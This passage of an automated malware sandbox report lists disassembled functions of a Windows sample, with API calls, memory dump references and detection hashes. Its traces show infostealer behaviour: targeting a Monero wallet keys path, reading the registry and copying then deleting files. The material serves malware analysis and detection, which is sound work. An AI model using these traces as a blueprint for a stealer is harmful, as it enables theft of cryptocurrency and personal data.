                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 9e857970262d9881a1ff33609ad9de73ff4b2afdfe9c74dce89c955f623efa36
                        • Instruction ID: 610f229d7c120aecabc4fa881991e8b6944a918a4a0fdf24a24ccf9b20da39eb
                        • Opcode Fuzzy Hash: 9e857970262d9881a1ff33609ad9de73ff4b2afdfe9c74dce89c955f623efa36
                        • Instruction Fuzzy Hash: 924199B69101086BDB14EBA0DC4AFFE737DBB48300F044559BA1967181EA755BCC8BA2
                        Function 00C56920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00C5696C
                        • sscanf.NTDLL ref: 00C56999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C569B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C569C0
                        • ExitProcess.KERNEL32 ref: 00C569DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 1e9c6dab442be68ddbfe39b20f529e78543d5fc73b7cff59f593583b4db3afab
                        • Instruction ID: adf7dd5123cb361f776de8b66aaa66b8c829846045492e4677fbf73ec7608d6f
                        • Opcode Fuzzy Hash: 1e9c6dab442be68ddbfe39b20f529e78543d5fc73b7cff59f593583b4db3afab
                        • Instruction Fuzzy Hash: 4821EB75D00208AFDF08EFE5D9499EEB7B5BF48301F04852AE41AF3250EB345609CB69
                        Function 00C57E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0088DC20,00000000,00020119,?), ref: 00C57E5E
                        • RegQueryValueExA.ADVAPI32(?,0089F828,00000000,00000000,000000FF,000000FF), ref: 00C57E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00C57E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 12203ae90337bdb995dd03b6e91c22505b2b721b1d572b83bfa95720ede66c49
                        • Instruction ID: 71d9da174ea1c04715f148a80194a91f884bec1d72ad931888466873c40fc07b
                        • Opcode Fuzzy Hash: 12203ae90337bdb995dd03b6e91c22505b2b721b1d572b83bfa95720ede66c49
                        • Instruction Fuzzy Hash: 7C1182B1A44205EFE714CF95DC4AF7BBBB8EB04711F10422AFA19B7280D7B458488BA1
                        Function 00C59260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(008A0108,?,?,?,00C5140C,?,008A0108,00000000), ref: 00C5926C
                        • lstrcpyn.KERNEL32(00E8AB88,008A0108,008A0108,?,00C5140C,?,008A0108), ref: 00C59290
                        • lstrlen.KERNEL32(?,?,00C5140C,?,008A0108), ref: 00C592A7
                        • wsprintfA.USER32 ref: 00C592C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 5e9938f510551722cfc1b0ccc7d72727a2a84b7379f84b339c0be4120e443403
                        • Instruction ID: 775259c0ed266d8776685b68754092c01842b8d18b0069331ee7402f7247f2b9
                        • Opcode Fuzzy Hash: 5e9938f510551722cfc1b0ccc7d72727a2a84b7379f84b339c0be4120e443403
                        • Instruction Fuzzy Hash: F0011A75500208FFDB04DFECC988EAE7BB9EB48391F188159F90DAB204C631EA44DB95
                        Function 00C412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C412B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C412BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C412D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C412F5
                        • RegCloseKey.ADVAPI32(?), ref: 00C412FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 9a16d7ec57909ba606c1b269f4473878690005712ca9fccef3cd117a0c2dd3d5
                        • Instruction ID: 2368b6e2a7b778755fbdd1674068d386a7d8de37725ed5795de2eeb5c96556d0
                        • Opcode Fuzzy Hash: 9a16d7ec57909ba606c1b269f4473878690005712ca9fccef3cd117a0c2dd3d5
                        • Instruction Fuzzy Hash: 490136B5A40208BFEB14DFD1DC49FAEB7B8EB48701F048156FA09E7280D6759A059F51
                        Function 00C5C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 449a72f59efeb99c7ba2fc8c5a2ed3f3f809653a08885e77d5ae82cc8595fc72
                        • Instruction ID: a5f95a91553d0036da02c5f8c98f7d4a849d222059890eeac597c343f10161dd
                        • Opcode Fuzzy Hash: 449a72f59efeb99c7ba2fc8c5a2ed3f3f809653a08885e77d5ae82cc8595fc72
                        • Instruction Fuzzy Hash: 2D41E4B910079C5EDB318B248CC4BFBBBF89F45705F1444E8ED9A86182D2719B89DF68
                        Function 00C56630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C56663
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C56726
                        • ExitProcess.KERNEL32 ref: 00C56755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 2af35dd71e3bb9385c78ba4dc4dbaf2b599aef8a782a4ca5213030464fc61f52
                        • Instruction ID: 09d58765b412e5bbd1d9515f09fedd3407fb4992f6c8d6a897bea0866fbaaa25
                        • Opcode Fuzzy Hash: 2af35dd71e3bb9385c78ba4dc4dbaf2b599aef8a782a4ca5213030464fc61f52
                        • Instruction Fuzzy Hash: 7E3149B5801218AEDB14EB91DC82BDEB778AF04301F404299F60976191DF746B8CDF6A
                        Function 00C587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C60E28,00000000,?), ref: 00C5882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58836
                        • wsprintfA.USER32 ref: 00C58850
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 897d7246373d2ada6db16c6c2ed3224209939762f8a0bd506a59cd40cca162e2
                        • Instruction ID: 1f2c63ea94891f32ff9ffce4b88dc011b9fb65ad20470bb7526b4953aded9e5e
                        • Opcode Fuzzy Hash: 897d7246373d2ada6db16c6c2ed3224209939762f8a0bd506a59cd40cca162e2
                        • Instruction Fuzzy Hash: 482157B1A40204AFEB04DFD5DD49FAEBBB8FB48701F14412AF609B7280C7795904CBA5
                        Function 00C58D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C5951E,00000000), ref: 00C58D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58D62
                        • wsprintfW.USER32 ref: 00C58D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 1e3b25aa4124b3e638c9ae3b745637405118975d00e7b8529c5fb6ffe7c1db76
                        • Instruction ID: a970751f0f4a87972fd5d31b5dc884eea34552a3e90e89bd2b74e01affa90319
                        • Opcode Fuzzy Hash: 1e3b25aa4124b3e638c9ae3b745637405118975d00e7b8529c5fb6ffe7c1db76
                        • Instruction Fuzzy Hash: 94E08670A40208BFD714DBD5DC0EE5977B8EB04701F040065FE0DA7280D9715E049B62
                        Function 00C4A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00C4A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00C4A6BC
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 28adb393513628bd0edd266418c8590145dbb657318a0a23f8d9a39480350459
                        • Instruction ID: 462768b7e17fb4ba2d1e2e79097b154bd4afa20449f61239f3f943677e1cbfe1
                        • Opcode Fuzzy Hash: 28adb393513628bd0edd266418c8590145dbb657318a0a23f8d9a39480350459
                        • Instruction Fuzzy Hash: DCE105768101189BDB14FBA5DC91EEE7338BF14301F548269F91772091EF306A8DDB6A
                        Function 00C4D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4D481
                        • lstrlen.KERNEL32(00000000), ref: 00C4D698
                        • lstrlen.KERNEL32(00000000), ref: 00C4D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
